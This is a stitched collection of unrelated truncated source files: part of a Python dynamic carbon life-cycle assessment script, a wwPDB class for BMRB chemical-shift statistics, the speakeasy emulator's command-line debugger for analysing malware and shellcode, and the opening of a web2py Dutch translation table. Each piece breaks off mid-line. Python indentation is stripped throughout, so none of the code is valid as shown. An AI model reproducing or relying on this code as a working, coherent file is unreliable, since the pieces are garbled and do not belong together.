plt.plot(t,decomp_tot_CO2_S1_Tgr_40y,label='Tgr_40y')
plt.plot(t,decomp_tot_CO2_S1_Tgr_60y,label='Tgr_60y')
plt.plot(t,decomp_tot_CO2_E_Hbr_40y,label='E_Hbr_40y')
plt.xlim(0,200)
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=False)
plt.show()
#%%
#Step (8): Sum the emissions and sequestration (net carbon balance), CO2 and CH4 are separated
#https://stackoverflow.com/questions/52703442/python-sum-values-from-multiple-lists-more-than-two
#C_loss + C_remainAGB + C_remainHWP + PH_Emissions_PO
Emissions_S1_Ac_7y = [c_firewood_energy_S1_Ac7, decomp_tot_S1_Ac_7y[:,0], TestDSM1_Ac7.o, PH_Emissions_HWP1_Ac_7y, decomp_tot_CO2_S1_Ac_7y[:,0]]
Emissions_S1_Ac_18y = [c_firewood_energy_S1_Ac18, decomp_tot_S1_Ac_18y[:,0], TestDSM1_Ac18.o, PH_Emissions_HWP1_Ac_18y, decomp_tot_CO2_S1_Ac_18y[:,0]]
Emissions_S1_Tgr_40y = [c_firewood_energy_S1_Tgr40, decomp_tot_S1_Tgr_40y[:,0], TestDSM1_Tgr40.o, PH_Emissions_HWP1_Tgr_40y, decomp_tot_CO2_S1_Tgr_40y[:,0]]
Emissions_S1_Tgr_60y = [c_firewood_energy_S1_Tgr60, decomp_tot_S1_Tgr_60y[:,0], TestDSM1_Tgr60.o, PH_Emissions_HWP1_Tgr_60y, decomp_tot_CO2_S1_Tgr_60y[:,0]]
Emissions_E_Hbr_40y = [c_firewood_energy_E_Hbr40, c_pellets_Hbr_40y, decomp_tot_E_Hbr_40y[:,0], TestDSME_Hbr40.o, PH_Emissions_HWPE_Hbr_40y, decomp_tot_CO2_E_Hbr_40y[:,0]]
Emissions_DL_FP_S1_Ac_7y = [sum(x) for x in zip(*Emissions_S1_Ac_7y)]
Emissions_DL_FP_S1_Ac_18y = [sum(x) for x in zip(*Emissions_S1_Ac_18y)]
Emissions_DL_FP_S1_Tgr_40y = [sum(x) for x in zip(*Emissions_S1_Tgr_40y)]
Emissions_DL_FP_S1_Tgr_60y = [sum(x) for x in zip(*Emissions_S1_Tgr_60y)]
Emissions_DL_FP_E_Hbr_40y = [sum(x) for x in zip(*Emissions_E_Hbr_40y)]
#CH4_S1_Ac_7y
Emissions_CH4_DL_FP_S1_Ac_7y = decomp_tot_CH4_S1_Ac_7y[:,0]
#CH4_S1_Ac_18y
Emissions_CH4_DL_FP_S1_Ac_18y = decomp_tot_CH4_S1_Ac_18y[:,0]
#CH4_S1_Tgr_40y
Emissions_CH4_DL_FP_S1_Tgr_40y = decomp_tot_CH4_S1_Tgr_40y[:,0]
#CH4_S1_Tgr_60y
Emissions_CH4_DL_FP_S1_Tgr_60y = decomp_tot_CH4_S1_Tgr_60y[:,0]
#CH4_E_Hbr_40y
Emissions_CH4_DL_FP_E_Hbr_40y = decomp_tot_CH4_E_Hbr_40y[:,0]
#%%
#Step (9): Generate the excel file (emissions_seq_scenarios.xlsx) from Step (8) calculation
#print year column
year = []
for x in range (0, tf):
year.append(x)
print (year)
#print CH4 emission column
import itertools
lst = [0]
Emissions_CH4 = list(itertools.chain.from_iterable(itertools.repeat(x, tf) for x in lst))
print(Emissions_CH4)
#print emission ref
lst1 = [0]
Emission_ref = list(itertools.chain.from_iterable(itertools.repeat(x, tf) for x in lst1))
print(Emission_ref)
#replace the first element with 1 to denote the emission reference as year 0 (for dynGWP calculation)
Emission_ref[0] = 1
print(Emission_ref)
Col1 = year
Col2_S1_Ac_7y = Emissions_DL_FP_S1_Ac_7y
Col2_S1_Ac_18y = Emissions_DL_FP_S1_Ac_18y
Col2_S1_Tgr_40y = Emissions_DL_FP_S1_Tgr_40y
Col2_S1_Tgr_60y = Emissions_DL_FP_S1_Tgr_60y
Col2_E_Hbr_40y = Emissions_DL_FP_E_Hbr_40y
Col3_S1_Ac_7y = Emissions_CH4_DL_FP_S1_Ac_7y
Col3_S1_Ac_18y = Emissions_CH4_DL_FP_S1_Ac_18y
Col3_S1_Tgr_40y = Emissions_CH4_DL_FP_S1_Tgr_40y
Col3_S1_Tgr_60y = Emissions_CH4_DL_FP_S1_Tgr_60y
Col3_E_Hbr_40y = Emissions_CH4_DL_FP_E_Hbr_40y
Col4 = Emission_ref
Col5 = flat_list_Ac_7y
Col6 = flat_list_Ac_18y
Col7 = flat_list_Tgr_40y
Col8 = flat_list_Tgr_60y
Col9 = flat_list_Hbr_40y
#<NAME>
df1_Ac_7y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Ac_7y,'kg_CH4':Col3_S1_Ac_7y,'kg_CO2_seq':Col5,'emission_ref':Col4})
df1_Ac_18y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Ac_18y,'kg_CH4':Col3_S1_Ac_18y,'kg_CO2_seq':Col6,'emission_ref':Col4})
#<NAME>
df1_Tgr_40y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Tgr_40y,'kg_CH4':Col3_S1_Tgr_40y,'kg_CO2_seq':Col7,'emission_ref':Col4})
df1_Tgr_60y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_S1_Tgr_60y,'kg_CH4':Col3_S1_Tgr_60y,'kg_CO2_seq':Col8,'emission_ref':Col4})
#<NAME>
dfE_Hbr_40y = pd.DataFrame.from_dict({'Year':Col1,'kg_CO2':Col2_E_Hbr_40y,'kg_CH4':Col3_E_Hbr_40y,'kg_CO2_seq':Col9,'emission_ref':Col4})
writer = pd.ExcelWriter('emissions_seq_DL_FP_S1.xlsx', engine = 'xlsxwriter')
df1_Ac_7y.to_excel(writer, sheet_name = 'DL_FP_S1_Ac_7y', header=True, index=False )
df1_Ac_18y.to_excel(writer, sheet_name = 'DL_FP_S1_Ac_18y', header=True, index=False)
df1_Tgr_40y.to_excel(writer, sheet_name = 'DL_FP_S1_Tgr_40y', header=True, index=False)
df1_Tgr_60y.to_excel(writer, sheet_name = 'DL_FP_S1_Tgr_60y', header=True, index=False)
dfE_Hbr_40y.to_excel(writer, sheet_name = 'DL_FP_E_Hbr_40y', header=True, index=False)
writer.save()
writer.close()
#df1.to_excel('test.xlsx', 'nuclues', header=True, index=False)
#df2.to_excel('test.xlsx', 'plasma', header=True, index=False)
#%%
## DYNAMIC LCA
# Step (10): Set General Parameters for Dynamic LCA calculation
aCH4 = 0.129957e-12; # methane - instantaneous radiative forcing per unit mass [W/m2 /kgCH4]
TauCH4 = 12; # methane - lifetime (years)
aCO2 = 0.0018088e-12; # CO2 - instantaneous radiative forcing per unit mass [W/m2 /kgCO2]
TauCO2 = [172.9, 18.51, 1.186]; # CO2 parameters according to Bern carbon cycle-climate model
aBern = [0.259, 0.338, 0.186]; # CO2 parameters according to Bern carbon cycle-climate model
a0Bern = 0.217; # CO2 parameters according to Bern carbon cycle-climate model
tf = 202 #until 202 because we want to get the DCF(t-i) until DCF(201) to determine the impact from the emission from the year 200 (There is no DCF(0))
#%%
#Step (11): Bern 2.5 CC Model, determine atmospheric load (C(t)) for GHG (CO2 and | |
##
# File: BMRBChemShiftStat.py
# Date: 20-Sep-2019
#
# Updates:
# 26-Feb-2020 <NAME> - load csv resource files if pickle is not available
# 04-Mar-2020 <NAME> - support lazy import of others (non-standard residues, DAOTHER-5498)
# 16-Apr-2020 <NAME> - fix ambiguity code of atom name starts with 'Q' (e.g. LYZ:QZ)
# 20-Nov-2020 <NAME> - fix statics extraction for HEM, HEB, HEC from CSV (DAOTHER-6366)
# 25-Jun-2021 <NAME> - add getAtomLikeNameSet() (DAOTHER-6830)
# 13-Oct-2021 <NAME> - code revision according to PEP8 using Pylint (DAOTHER-7389, issue #5)
# 03-Dec-2021 <NAME> - optimize loading performance of other chemical shift statistics (DAOTHER-7514)
##
""" Wrapper class for retrieving BMRB chemical shift statistics.
@author: <NAME>
"""
import sys
import os
import os.path
import csv
import re
import copy
import pickle
import collections
from wwpdb.utils.config.ConfigInfo import getSiteId
from wwpdb.utils.config.ConfigInfoApp import ConfigInfoAppCommon
from wwpdb.utils.nmr.io.ChemCompIo import ChemCompReader
def load_stat_from_pickle(file_name):
""" Load BMRB chemical shift statistics from pickle file if possible.
"""
if os.path.exists(file_name):
with open(file_name, 'rb') as f:
return pickle.load(f)
return []
def write_stat_as_pickle(atm_list, file_name):
""" Write BMRB chemical shift statistics as pickle file.
"""
with open(file_name, 'wb') as f:
pickle.dump(atm_list, f)
class BMRBChemShiftStat:
""" Wrapper class for retrieving BMRB chemical shift statistics.
"""
def __init__(self):
# lazy import of others (non-standard residues)
self.lazy_others = True
# directory
self.stat_dir = os.path.dirname(__file__) + '/bmrb_cs_stat/'
# statistics objects
self.aa_filt = []
self.aa_full = []
self.dna_filt = []
self.dna_full = []
self.rna_filt = []
self.rna_full = []
self.others = []
self.extras = []
self.__aa_comp_ids = set()
self.__dna_comp_ids = set()
self.__rna_comp_ids = set()
self.__oth_comp_ids = set()
self.__ext_comp_ids = set()
self.__std_comp_ids = set()
self.__all_comp_ids = set()
self.__not_comp_ids = set()
self.aa_threshold = 0.1
self.na_threshold = 0.3
self.max_count_th = 10
# CCD accessing utility
self.__verbose = False
self.__lfh = sys.stderr
self.__cICommon = ConfigInfoAppCommon(getSiteId())
self.__ccCvsPath = self.__cICommon.get_site_cc_cvs_path()
self.__ccR = ChemCompReader(self.__verbose, self.__lfh)
self.__ccR.setCachePath(self.__ccCvsPath)
self.__last_comp_id = None
self.__last_comp_id_test = False
self.__last_chem_comp_dict = None
self.__last_chem_comp_atoms = None
self.__last_chem_comp_bonds = None
# taken from wwpdb.apps.ccmodule.io.ChemCompIo
self.__chem_comp_atom_dict = [
('_chem_comp_atom.comp_id', '%s', 'str', ''),
('_chem_comp_atom.atom_id', '%s', 'str', ''),
('_chem_comp_atom.alt_atom_id', '%s', 'str', ''),
('_chem_comp_atom.type_symbol', '%s', 'str', ''),
('_chem_comp_atom.charge', '%s', 'str', ''),
('_chem_comp_atom.pdbx_align', '%s', 'str', ''),
('_chem_comp_atom.pdbx_aromatic_flag', '%s', 'str', ''),
('_chem_comp_atom.pdbx_leaving_atom_flag', '%s', 'str', ''),
('_chem_comp_atom.pdbx_stereo_config', '%s', 'str', ''),
('_chem_comp_atom.model_Cartn_x', '%s', 'str', ''),
('_chem_comp_atom.model_Cartn_y', '%s', 'str', ''),
('_chem_comp_atom.model_Cartn_z', '%s', 'str', ''),
('_chem_comp_atom.pdbx_model_Cartn_x_ideal', '%s', 'str', ''),
('_chem_comp_atom.pdbx_model_Cartn_y_ideal', '%s', 'str', ''),
('_chem_comp_atom.pdbx_model_Cartn_z_ideal', '%s', 'str', ''),
('_chem_comp_atom.pdbx_component_atom_id', '%s', 'str', ''),
('_chem_comp_atom.pdbx_component_comp_id', '%s', 'str', ''),
('_chem_comp_atom.pdbx_ordinal', '%s', 'str', ' ')
]
atom_id = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.atom_id')
self.__cca_atom_id = self.__chem_comp_atom_dict.index(atom_id)
aromatic_flag = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.pdbx_aromatic_flag')
self.__cca_aromatic_flag = self.__chem_comp_atom_dict.index(aromatic_flag)
leaving_atom_flag = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.pdbx_leaving_atom_flag')
self.__cca_leaving_atom_flag = self.__chem_comp_atom_dict.index(leaving_atom_flag)
type_symbol = next(d for d in self.__chem_comp_atom_dict if d[0] == '_chem_comp_atom.type_symbol')
self.__cca_type_symbol = self.__chem_comp_atom_dict.index(type_symbol)
# taken from wwpdb.apps.ccmodule.io.ChemCompIo
self.__chem_comp_bond_dict = [
('_chem_comp_bond.comp_id', '%s', 'str', ''),
('_chem_comp_bond.atom_id_1', '%s', 'str', ''),
('_chem_comp_bond.atom_id_2', '%s', 'str', ''),
('_chem_comp_bond.value_order', '%s', 'str', ''),
('_chem_comp_bond.pdbx_aromatic_flag', '%s', 'str', ''),
('_chem_comp_bond.pdbx_stereo_config', '%s', 'str', ''),
('_chem_comp_bond.pdbx_ordinal', '%s', 'str', '')
]
atom_id_1 = next(d for d in self.__chem_comp_bond_dict if d[0] == '_chem_comp_bond.atom_id_1')
self.__ccb_atom_id_1 = self.__chem_comp_bond_dict.index(atom_id_1)
atom_id_2 = next(d for d in self.__chem_comp_bond_dict if d[0] == '_chem_comp_bond.atom_id_2')
self.__ccb_atom_id_2 = self.__chem_comp_bond_dict.index(atom_id_2)
aromatic_flag = next(d for d in self.__chem_comp_bond_dict if d[0] == '_chem_comp_bond.pdbx_aromatic_flag')
self.__ccb_aromatic_flag = self.__chem_comp_bond_dict.index(aromatic_flag)
if not self.loadStatFromPickleFiles():
self.loadStatFromCsvFiles()
def isOk(self):
""" Return whether all BMRB chemical shift statistics are available.
"""
return len(self.aa_filt) > 0 and len(self.aa_full) > 0 and len(self.dna_filt) > 0 and len(self.dna_full) > 0 and \
len(self.rna_filt) > 0 and len(self.rna_full) and (len(self.others) > 0 or self.lazy_others)
def hasCompId(self, comp_id):
""" Return whether a given comp_id has BMRB chemical shift statistics.
"""
if comp_id in self.__std_comp_ids:
return True
self.loadOtherStatFromCsvFiles(comp_id)
return comp_id in self.__all_comp_ids
def getTypeOfCompId(self, comp_id):
""" Return type of a given comp_id.
@return: array of bool: peptide, nucleotide, carbohydrate
"""
if comp_id in self.__aa_comp_ids:
return True, False, False
if comp_id in self.__dna_comp_ids or comp_id in self.__rna_comp_ids:
return False, True, False
if self.__updateChemCompDict(comp_id):
ctype = self.__last_chem_comp_dict['_chem_comp.type']
if 'PEPTIDE' in ctype:
return True, False, False
if 'DNA' in ctype or 'RNA' in ctype:
return False, True, False
if 'SACCHARIDE' in ctype:
return False, False, True
peptide_like = len(self.getBackBoneAtoms(comp_id, True, True, False, False))
nucleotide_like = len(self.getBackBoneAtoms(comp_id, True, False, True, False))
carbohydrate_like = len(self.getBackBoneAtoms(comp_id, True, False, False, True))
return peptide_like > nucleotide_like and peptide_like > carbohydrate_like,\
nucleotide_like > peptide_like and nucleotide_like > carbohydrate_like,\
carbohydrate_like > peptide_like and carbohydrate_like > nucleotide_like
def hasEnoughStat(self, comp_id, primary=True):
""" Return whether a given comp_id has enough chemical shift statistics.
"""
if comp_id in self.__std_comp_ids:
return True
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
return False
if primary:
if any(i for i in self.others if i['comp_id'] == comp_id and i['primary']):
return True
else:
if any(i for i in self.others if i['comp_id'] == comp_id and 'secondary' in i and i['secondary']):
return True
return False
def get(self, comp_id, diamagnetic=True):
""" Return BMRB chemical shift statistics for a given comp_id.
"""
if comp_id in self.__aa_comp_ids:
if diamagnetic:
return [i for i in self.aa_filt if i['comp_id'] == comp_id]
return [i for i in self.aa_full if i['comp_id'] == comp_id]
if comp_id in self.__dna_comp_ids:
if diamagnetic:
return [i for i in self.dna_filt if i['comp_id'] == comp_id]
return [i for i in self.dna_full if i['comp_id'] == comp_id]
if comp_id in self.__rna_comp_ids:
if diamagnetic:
return [i for i in self.rna_filt if i['comp_id'] == comp_id]
return [i for i in self.rna_full if i['comp_id'] == comp_id]
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
return []
return [i for i in self.others if i['comp_id'] == comp_id]
def __get(self, comp_id, diamagnetic=True):
""" Return atom list for a given comp_id.
"""
if comp_id in self.__aa_comp_ids:
if diamagnetic:
return [i for i in self.aa_filt if i['comp_id'] == comp_id]
return [i for i in self.aa_full if i['comp_id'] == comp_id]
if comp_id in self.__dna_comp_ids:
if diamagnetic:
return [i for i in self.dna_filt if i['comp_id'] == comp_id]
return [i for i in self.dna_full if i['comp_id'] == comp_id]
if comp_id in self.__rna_comp_ids:
if diamagnetic:
return [i for i in self.rna_filt if i['comp_id'] == comp_id]
return [i for i in self.rna_full if i['comp_id'] == comp_id]
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
self.__appendExtraFromCcd(comp_id)
if comp_id in self.__oth_comp_ids:
return [i for i in self.others if i['comp_id'] == comp_id]
if comp_id in self.__ext_comp_ids:
return [i for i in self.extras if i['comp_id'] == comp_id]
return []
def getMaxAmbigCodeWoSetId(self, comp_id, atom_id):
""" Return maximum ambiguity code of a given atom that does not require declaration of ambiguity set ID.
@return: one of (1, 2, 3), 0 for not found
"""
if comp_id not in self.__std_comp_ids:
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
self.__appendExtraFromCcd(comp_id)
try:
d = next(i['desc'] for i in self.__get(comp_id) if i['atom_id'] == atom_id)
if 'geminal' in d:
return 2
if d == 'aroma-opposite':
return 3
return 1
except StopIteration:
return 0
def getGeminalAtom(self, comp_id, atom_id):
""" Return geminal or aromatic opposite atom of a given atom.
"""
if comp_id not in self.__std_comp_ids:
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
self.__appendExtraFromCcd(comp_id)
cs_stat = self.__get(comp_id)
try:
d = next(i['desc'] for i in cs_stat if i['atom_id'] == atom_id)
if d == 'methyl-geminal' and atom_id[0] == 'H':
return next(i['atom_id'] for i in cs_stat
if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'][:-2] == atom_id[:-2] and i['atom_id'][-1] == atom_id[-1])
if 'geminal' in d or d == 'aroma-opposite':
if not atom_id.endswith("'"):
return next(i['atom_id'] for i in cs_stat
if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'][:-1] == atom_id[:-1])
if atom_id.endswith("''"):
return next(i['atom_id'] for i in cs_stat
if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'] == atom_id[:-1])
return next(i['atom_id'] for i in cs_stat
if i['desc'] == d and i['atom_id'] != atom_id and i['atom_id'] == atom_id + "'")
return None
except StopIteration:
return None
def getAllAtoms(self, comp_id, excl_minor_atom=False, primary=False):
""" Return all atoms of a given comp_id.
"""
if comp_id not in self.__std_comp_ids:
self.loadOtherStatFromCsvFiles(comp_id)
if comp_id not in self.__all_comp_ids:
self.__appendExtraFromCcd(comp_id)
cs_stat = self.__get(comp_id)
if comp_id in self.__std_comp_ids or primary:
return [i['atom_id'] for i in cs_stat if
(not excl_minor_atom or (excl_minor_atom and i['primary']))]
return [i['atom_id'] for i in cs_stat if
(not excl_minor_atom or 'secondary' not in i or (excl_minor_atom and i['secondary']))]
def | |
<reponame>dtrizna/speakeasy<gh_stars>100-1000
# Copyright (C) 2021 FireEye, Inc. All Rights Reserved.
import os
import sys
import cmd
import shlex
import fnmatch
import logging
import binascii
import argparse
import traceback
import hexdump
import speakeasy
import speakeasy.winenv.arch as e_arch
from speakeasy.errors import SpeakeasyError
if sys.platform != 'win32':
import readline # noqa (used by cmd)
class DebuggerException(Exception):
pass
def get_logger():
"""
Get the default logger for speakeasy
"""
logger = logging.getLogger('sedbg')
if not logger.handlers:
sh = logging.StreamHandler()
logger.addHandler(sh)
logger.setLevel(logging.INFO)
return logger
class Breakpoint(object):
_id = 0
def __init__(self, address):
if isinstance(address, int):
self.address = address
else:
self.address = address.lower()
self.id = Breakpoint._id
Breakpoint._id += 1
class SpeakeasyDebugger(cmd.Cmd):
prompt = '(sedbg) '
file = None
def __init__(self, target=None, is_sc=False, arch=None, data=None, logger=None, se_inst=None):
super(SpeakeasyDebugger, self).__init__()
self.target = target
self.is_sc = is_sc
self.arch = arch
self.logger = logger
if not se_inst:
self.se = speakeasy.Speakeasy(logger=self.logger)
else:
self.se = se_inst
self.loaded_modules = []
self.loaded_shellcode = []
self.targets = []
self.breakpoints = {}
self.init_state()
if self.is_sc and not self.arch:
raise DebuggerException('Architecture required when debugging shellcode')
if self.target:
if not self.is_sc:
# Load the initial target module
self.load_module(self.target)
else:
self.load_shellcode(self.target, self.arch)
def init_state(self):
if self.se:
self.se.add_code_hook(self.code_hook)
self.se.add_api_hook(self.api_hook, '*', '*') # hook every API
self.step = False
self.running = False
self._do_stop = False
self.exit = False
self.step_over = 0
self.next_pc = 0
def error(self, msg):
self.logger.error('[-] ' + msg)
def info(self, msg):
self.logger.info(msg)
def log_disasm(self, addr, size):
ds = self.se.disasm(addr, size, False)[0]
out = '0x%x: %s %s' % (ds.address, ds.mnemonic, ds.op_str)
self.info(out)
def format_hexdump(self, data, address=0):
output = []
for line in hexdump.hexdump(data, result='generator'):
offset = line[: line.find(':')]
rest = line[line.find(':'):]
offset = int.from_bytes(binascii.unhexlify(offset), 'big')
if address > 0xFFFFFFFF:
fmt = r'%016X'
else:
fmt = r'%08X'
addr = fmt % (offset + address)
output.append(addr + rest)
return '\n'.join(output)
def _break(self, addr):
'''
Return execution back to the debugger and do not execute the
current instruction.
'''
self.step = False
self._do_stop = True
self.next_pc = addr
self.se.stop()
def api_hook(self, emu, api_name, func, params):
'''
Hook called for API calls
'''
rv = func(params)
addr = emu.get_ret_address()
bp = self.breakpoints.get(api_name.lower())
if bp:
self.info('\nBreakpoint %d hit for %s' % (bp.id, api_name))
self.step = True
return rv
elif '.' in api_name:
fn = api_name.split('.')[1]
bp = self.breakpoints.get(fn.lower())
if bp:
self.info('\nBreakpoint %d hit for %s' % (bp.id, api_name))
self.step = True
return rv
for addr, bp in self.breakpoints.items():
if not isinstance(addr, int):
if fnmatch.fnmatch(api_name.lower(), addr.lower()):
self.info('\nBreakpoint %d hit for %s' % (bp.id, api_name))
self.step = True
return rv
return rv
def code_hook(self, emu, addr, size, ctx):
'''
Hook called for each instruction while debugging
'''
if self._do_stop:
self.next_pc = addr
self._do_stop = False
return True
if self.breakpoints:
bp = self.breakpoints.get(addr)
if bp:
self.log_disasm(addr, size)
self.info('\nBreakpoint %d hit for 0x%x' % (bp.id, addr))
self._break(addr)
return True
if self.step:
sres, eres = emu.get_reserved_ranges()
if sres < addr < eres:
addr = emu.get_ret_address()
self.log_disasm(addr, size)
self._break(addr)
return True
def stop(self):
'''
Stop running the emulator
'''
self.se.stop()
self.running = False
def convert_bin_str(self, hstr):
'''
Convert a hex string to an int
'''
# Was a register supplied? Read it.
regs = self.se.get_all_registers()
val = regs.get(hstr.lower())
if val:
hstr = val
if hstr.startswith('0x'):
int_val = int(hstr, 16)
else:
int_val = int(hstr, 10)
return int_val
def dump_mem(self, address, length):
'''
Dump memory (until an invalid memory read or max length occurs)
'''
data = []
try:
for i in range(length):
data.append(self.se.mem_read(address + i, 1))
except SpeakeasyError:
self.error("Failed memory read at address: 0x%x" % (address + i))
return b''.join(data)
def write_mem(self, address, data):
'''
Write memory (until an invalid memory read or max length occurs)
'''
try:
for i, b in enumerate(bytes(data)):
self.se.mem_write(address + i, data[i: i + 1])
except Exception:
self.error("Failed memory write at address: 0x%x" % (address + i))
finally:
return
def do_maps(self, args):
'''
Get a list of all memory maps in the emulation space
Usage:
maps
'''
self.info('Base\t\t Size\t Tag')
for mm in self.se.get_mem_maps():
line = '0x%016x 0x%08x %s' % (mm.get_base(), mm.get_size(), mm.get_tag())
self.info(line)
def do_bl(self, args):
'''
List all current breakpoints and their IDs
Usage:
bl
'''
self.info('Breakpoints:')
for addr, bp in self.breakpoints.items():
if isinstance(addr, int):
line = '%d: 0x%016x' % (bp.id, addr)
else:
line = '%d: %s' % (bp.id, addr)
self.info(line)
def do_bp(self, args):
'''
Set a breakpoint at the specified address or API name
Usage:
bp [ <breakpoint_addr> | <api_name> ]
bp 0x10001020
'''
split_args = shlex.split(args)
address = split_args[0]
try:
address = self.convert_bin_str(address)
bp = Breakpoint(address)
msg = '[*] Breakpoint %d set at address 0x%x' % (bp.id, address)
rv = address
except Exception:
orig = address
address = address.lower()
bp = Breakpoint(address)
msg = '[*] Breakpoint %d set at %s' % (bp.id, orig)
rv = None
self.breakpoints.update({address: bp})
self.info(msg)
return rv
def do_bc(self, args):
'''
Remove a breakpoint by ID
Usage:
bc <breakpoint_id>
bc 1
'''
split_args = shlex.split(args)
try:
_id = int(split_args[0])
except Exception:
self.error('Invalid breakpoint id')
return None
for addr, bp in self.breakpoints.items():
if _id == bp.id:
self.info('[*] Removing breakpoint %d' % (_id))
self.breakpoints.pop(addr)
return addr
def do_disas(self, args):
'''
Disassemble an address
Usage:
disas <address> [length]
'''
split_args = shlex.split(args)
if not split_args:
self.error('Invalid arguments: disas <address> [size]')
return
address = ''
length = '0x10'
address = split_args[0]
try:
length = split_args[1]
except IndexError:
# Use the default length
pass
try:
addr = self.convert_bin_str(address)
length = self.convert_bin_str(length)
instrs = self.se.disasm(addr, length, False)
except ValueError:
self.error('Invalid arguments')
return
except SpeakeasyError:
self.error('Failed to disassemble at address: %s' % (address))
return
for i in instrs:
self.info('0x%x: %s %s' % (i.address, i.mnemonic, i.op_str))
def load_module(self, module):
'''
Load a module into the emulation space
'''
if not os.path.exists(module):
self.error('Can\'t find module: %s' % (module))
else:
module = self.se.load_module(module)
self.loaded_modules.append(module)
def load_shellcode(self, sc_path, arch):
'''
Load shellcode into the emulation space
'''
if self.is_sc:
arch = arch.lower()
if arch in ('x86', 'i386'):
arch = e_arch.ARCH_X86
elif arch in ('x64', 'amd64'):
arch = e_arch.ARCH_AMD64
else:
raise Exception('Unsupported architecture: %s' % arch)
if not os.path.exists(sc_path):
self.error('Can\'t find shellcode: %s' % (sc_path))
else:
sc = self.se.load_shellcode(sc_path, arch)
self.loaded_shellcode.append(sc)
return sc
def do_restart(self, arg):
'''
Restart emulation from the entry point
'''
self.se = speakeasy.Speakeasy(logger=self.logger)
if self.target:
if not self.is_sc:
# Load the initial target module
self.load_module(self.target)
else:
self.load_shellcode(self.target, self.arch)
self.init_state()
self.do_run(None)
def do_load_module(self, arg):
'''
Wrapper to load a module
'''
self.load_module(arg)
def do_eb(self, args):
'''
Edit bytes at the specified address
Usage:
eb <address> <byte_string>
Example:
eb 0x401000 9090909090c3
'''
split_args = shlex.split(args)
if len(split_args) < 2:
self.error('Invalid arguments: eb <address> <byte_string>')
return
address = split_args[0]
address = self.convert_bin_str(address)
data = ''.join(split_args[1:])
# Do some basic normalization
if data.startswith('0x'):
data = data[2:]
data = data.replace(' ', '')
if len(data) % 2:
data = '0' + data
data = binascii.unhexlify(data)
self.write_mem(address, data)
def do_db(self, args):
'''
Dump bytes from emulated memory
Usage:
db <address> [length]
Example:
db 0x401000
'''
split_args = shlex.split(args)
if len(split_args) < 1:
self.error('Invalid arguments: db <address> <size>')
return
address = split_args[0]
address = self.convert_bin_str(address)
decoy = self.se.emu.get_mod_from_addr(address)
if decoy:
self.se.emu.map_decoy(decoy)
if len(split_args) == 1:
address = split_args[0]
address = self.convert_bin_str(address)
data = self.dump_mem(address, 0x50)
elif len(split_args) == 2:
address, length = split_args
address = self.convert_bin_str(address)
length = self.convert_bin_str(length)
data = self.dump_mem(address, length)
output = self.format_hexdump(data, address=address)
self.info(output)
def do_lm(self, args):
'''
List user modules loaded into the emulation space
Usage:
lm
'''
ums = self.se.get_user_modules()
self.info('Start\t\t\tEnd\t\t\tName\t\tPath')
for um in ums:
base = '0x%016x' % um.get_base()
end = '0x%016x' % (um.get_base() + um.get_image_size())
name = um.get_base_name().ljust(16)
path = um.get_emu_path()
self.info('%s\t%s\t%s%s' % (base, end, name, path))
def do_lmk(self, args):
'''
List kernel modules loaded into the emulation space
Usage:
lmk
'''
kms = self.se.get_sys_modules()
self.info('Start\t\t\tEnd\t\t\tName\t\tPath')
for km in kms:
base = '0x%016x' % km.get_base()
end = '0x%016x' % (km.get_base() + km.get_image_size())
name = km.get_base_name().ljust(16)
path = km.get_emu_path()
self.info('%s\t%s\t%s%s' % (base, end, name, path))
def do_reg(self, arg):
'''
Read or write the contents of the emulated cpu registers
Usage:
reg
reg <reg_to_read>
reg <reg_to_write>=<value>
'''
# Is the user requesting all registers?
regs = self.se.get_all_registers()
if not | |
<filename>web_version/languages/nl.py
# -*- coding: utf-8 -*-
{
'!langcode!': 'nl',
'!langname!': 'Nederlands',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN',
'%(nrows)s records found': '%(nrows)s records gevonden',
'%d days ago': '%d dagen geleden',
'%d weeks ago': '%d weken gelden',
'%s %%{row} deleted': '%s rijen verwijderd',
'%s %%{row} updated': '%s rijen geupdate',
'%s selected': '%s geselecteerd',
'%Y-%m-%d': '%Y-%m-%d',
'%Y-%m-%d %H:%M:%S': '%Y-%m-%d %H:%M:%S',
'(something like "it-it")': '(zoiets als "nl-nl")',
'1 day ago': '1 dag geleden',
'1 week ago': '1 week gelden',
'<': '<',
'<=': '<=',
'=': '=',
'>': '>',
'>=': '>=',
'A new version of web2py is available': 'Een nieuwe versie van web2py is beschikbaar',
'A new version of web2py is available: %s': 'Een nieuwe versie van web2py is beschikbaar: %s',
'About': 'Over',
'about': 'over',
'About application': 'Over applicatie',
'Access Control': 'Toegangscontrole',
'Add': 'Toevoegen',
'additional code for your application': 'additionele code voor je applicatie',
'admin disabled because no admin password': 'admin is uitgezet omdat er geen admin wachtwoord is',
'admin disabled because not supported on google app engine': 'admin is uitgezet omdat dit niet ondersteund wordt op google app engine',
'admin disabled because unable to access password file': 'admin is uitgezet omdat het wachtwoordbestand niet geopend kan worden',
'Admin is disabled because insecure channel': 'Admin is uitgezet om het kanaal onveilig is',
'Admin is disabled because unsecure channel': 'Admin is uitgezet om het kanaal onveilig is',
'Administration': 'Administratie',
'Administrative Interface': 'Administratieve Interface',
'Administrator Password:': '<PASSWORD>',
'Ajax Recipes': 'Ajax Recepten',
'And': 'En',
'and rename it (required):': 'en hernoem deze (vereist)',
'and rename it:': 'en hernoem:',
'appadmin': 'appadmin',
